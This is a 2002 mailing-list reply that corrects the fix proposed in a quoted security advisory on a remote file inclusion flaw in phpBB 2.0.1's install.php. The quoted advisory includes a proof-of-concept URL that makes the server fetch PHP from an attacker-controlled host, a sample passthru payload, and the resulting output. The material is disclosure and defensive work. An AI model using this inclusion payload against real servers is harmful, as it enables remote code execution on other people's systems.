Note... The suggested fix for this in the php code below is very
incorrect and will in fact leave install.php even more wide open
than it currently is...
The correct fix to the php code should be to change the line on
or about line 28 which reads...
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
to read more properly
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
Thanks,
Jonathan L. Haase
On Sunday 16 June 2002 8:29 am, morris Chang wrote:
> JCC Security Advisory
> June 16, 2002
>
> malicious PHP source injection in phpBB
>
> Description
>
> phpBB is one of popular PHP bulletin board systems.
> When allow_url_fopen = On and register_globals = On in
> php.ini, phpBB has vulnerability because install.php contains
> dangerous codes. So an attacker can include any files into
> server's PHP codes.
>
> Impact
>
> It's tested on phpBB 2.0.1. but I think all of phpBB 2 is
> affected.
>
> Workaround
>
> allow_url_fopen = off and register_globals = off.
> and if complete install remove or rename install.php.
> Or in install.php
> -------install.php------------
> define('IN_PHPBB', true);
> $phpbb_root_path='./';
> ----------------------------
> Put it
> -------snip-----------------
> $phpbb_root_dir='./';
> ----------------------------
>
> Good idea to code that <<PHP_CODE
> ini_set("register_globals", "Off");
> ini_set ("allow_url_fopen", "Off");
> PHP_CODE
>
> Tested systems
>
> phpBB 2.0.1 Debian GNU/Linux SID(x86)
>
> Background
>
> We checked the vulnerability with
> "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"; and
> made a sample code, functions_selects.php,
>
> --------------------includes/functions_selects.php------------
>-- <? passthru("uname -a"); ?>
> -----------------------------------------
>
> and type the following URL to invoke this sample code.
>
> TEST URL :
> http://URL/install.php?phpbb_root_dir=http://MYBOX/";
>
> -------out put----------------------------
> Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686
> unknown Warning: Cannot add header information - headers
> already sent by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 182
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 183
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/install.php on line 346
> -----------------------------------------
>
> thx for BlackKnight at r0ar
> ---
> http://jcc.hackerslab.org(at morris Chang)
>
> e-mail : morris@xsdeny.net
